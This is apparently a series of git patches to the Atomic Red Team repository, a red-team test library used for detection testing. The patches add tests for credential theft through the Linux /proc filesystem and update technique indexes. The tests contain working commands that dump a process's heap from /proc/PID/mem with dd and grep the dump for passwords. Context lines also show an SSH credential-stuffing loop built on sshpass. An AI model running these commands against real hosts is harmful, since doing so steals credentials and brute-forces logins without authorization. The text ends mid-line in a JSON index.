[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | | | -| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | | | | | | | | | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | | | | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launch Daemon](../../T1543.004/T1543.004.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 686e91a6..9cb1ac61 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -4865,7 +4865,106 @@ credential-access: x_mitre_is_subtechnique: true x_mitre_platforms: - Linux - atomic_tests: [] + identifier: T1003.007 + atomic_tests: + - name: Dump individual process memory with sh (Local) + auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80 + description: | + Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to + copy process memory to an external file so it can be searched or exfiltrated later. + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: "/tmp/T1003.007.bin" + script_path: + description: Path to script generating the target process + type: Path + default: "/tmp/T1003.007.sh" + pid_term: + description: Unique string to use to identify target process + type: String + default: T1003.007 + dependencies: + - description: 'Script to launch target process must exist + +' + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + executor: + name: sh + elevation_required: true + command: | + sh #{script_path} + PID=$(pgrep -n -f "#{pid_term}") + HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1) + MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1)))) + MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2)))) + MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START))) + dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE" + grep -i "PASS" "#{output_file}" + cleanup_command: 'rm -f "#{output_file}" + +' + - name: Dump individual process memory with Python (Local) + auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 + description: | + Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to + copy a process's heap memory to an external file so it can be searched or exfiltrated later. + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: "/tmp/T1003.007.bin" + script_path: + description: Path to script generating the target process + type: Path + default: "/tmp/T1003.007.sh" + python_script: + description: Path to script generating the target process + type: Path + default: PathToAtomicsFolder/T1003.007/src/dump_heap.py + pid_term: + description: Unique string to use to identify target process + type: String + default: T1003.007 + dependencies: + - description: 'Script to launch target process must exist + +' + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + - description: 'Requires Python + +' + prereq_command: "(which python || which python3 || which python2)\n" + get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed" + +' + executor: + name: sh + elevation_required: true + command: | + sh #{script_path} + PID=$(pgrep -n -f "#{pid_term}") + PYTHON=$(which python || which python3 || which python2) + $PYTHON #{python_script} $PID #{output_file} + grep -i "PASS" "#{output_file}" + cleanup_command: 'rm -f "#{output_file}" + +' T1606.002: technique: external_references: diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md new file mode 100644 index 00000000..a23a5e9c --- /dev/null +++ b/atomics/T1003.007/T1003.007.md @@ -0,0 +1,134 @@ +# T1003.007 - Proc Filesystem +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007) +
Adversaries may gather credentials from information stored in the Proc filesystem or /proc. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. + +This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.
+ +## Atomic Tests + +- [Atomic Test #1 - Dump individual process memory with sh (Local)](#atomic-test-1---dump-individual-process-memory-with-sh-local) + +- [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local) + + +
+ +## Atomic Test #1 - Dump individual process memory with sh (Local) +Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to +copy process memory to an external file so it can be searched or exfiltrated later. + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin| +| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh| +| pid_term | Unique string to use to identify target process | String | T1003.007| + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +sh #{script_path} +PID=$(pgrep -n -f "#{pid_term}") +HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1) +MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1)))) +MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2)))) +MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START))) +dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE" +grep -i "PASS" "#{output_file}" +``` + +#### Cleanup Commands: +```sh +rm -f "#{output_file}" +``` + + + +#### Dependencies: Run with `sh`! +##### Description: Script to launch target process must exist +##### Check Prereq Commands: +```sh +test -f #{script_path} +grep "#{pid_term}" #{script_path} +``` +##### Get Prereq Commands: +```sh +echo '#!/bin/sh' > #{script_path} +echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} +``` + + + + +
+
+ +## Atomic Test #2 - Dump individual process memory with Python (Local) +Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to +copy a process's heap memory to an external file so it can be searched or exfiltrated later. + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin| +| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh| +| python_script | Path to script generating the target process | Path | PathToAtomicsFolder/T1003.007/src/dump_heap.py| +| pid_term | Unique string to use to identify target process | String | T1003.007| + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +sh #{script_path} +PID=$(pgrep -n -f "#{pid_term}") +PYTHON=$(which python || which python3 || which python2) +$PYTHON #{python_script} $PID #{output_file} +grep -i "PASS" "#{output_file}" +``` + +#### Cleanup Commands: +```sh +rm -f "#{output_file}" +``` + + + +#### Dependencies: Run with `sh`! +##### Description: Script to launch target process must exist +##### Check Prereq Commands: +```sh +test -f #{script_path} +grep "#{pid_term}" #{script_path} +``` +##### Get Prereq Commands: +```sh +echo '#!/bin/sh' > #{script_path} +echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} +``` +##### Description: Requires Python +##### Check Prereq Commands: +```sh +(which python || which python3 || which python2) +``` +##### Get Prereq Commands: +```sh +echo "Python 2.7+ or 3.4+ must be installed" +``` + + + + +
From 17eab72057d9638af27f6dea73636933db9010c2 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 11 Jun 2021 19:45:25 +0000 Subject: [PATCH 31/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1110.004/T1110.004.yaml | 2 ++ atomics/used_guids.txt | 2 ++ 2 files changed, 4 insertions(+) diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml index 29d8c304..0c408431 100644 --- a/atomics/T1110.004/T1110.004.yaml +++ b/atomics/T1110.004/T1110.004.yaml @@ -4,6 +4,7 @@ display_name: 'Brute Force: Credential Stuffing' atomic_tests: - name: SSH Credential Stuffing From Linux + auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad description: | Using username,password combination from a password dump to login over SSH. @@ -33,6 +34,7 @@ atomic_tests: for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done - name: SSH Credential Stuffing From MacOS + auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b description: | Using username,password combination from a password dump to login over SSH. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 55f9ed27..f60266d0 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -716,3 +716,5 @@ c89becbe-1758-4e7d-a0f4-97d2188a23e3 8fd5a296-6772-4766-9991-ff4e92af7240 7e91138a-8e74-456d-a007-973d67a0bb80 437b2003-a20d-4ed8-834c-4964f24eec63 +4f08197a-2a8a-472d-9589-cd2895ef22ad +d546a3d9-0be5-40c7-ad82-5a7d79e1b66b From 1f69c7fb087a3256e763e106a5888dc40cb222fa Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 11 Jun 2021 19:45:31 +0000 Subject: [PATCH 32/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer-macos.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/linux-index.csv | 1 + atomics/Indexes/Indexes-CSV/macos-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 4 +- .../Indexes/Indexes-Markdown/linux-index.md | 3 +- .../Indexes/Indexes-Markdown/macos-index.md | 3 +- atomics/Indexes/Matrices/linux-matrix.md | 2 +- atomics/Indexes/Matrices/macos-matrix.md | 2 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/index.yaml | 67 +++++++++- atomics/T1110.004/T1110.004.md | 115 ++++++++++++++++++ 14 files changed, 198 insertions(+), 10 deletions(-) create mode 100644 atomics/T1110.004/T1110.004.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 836c4f9a..969f8c8f 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 23c8d246..018c33c7 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 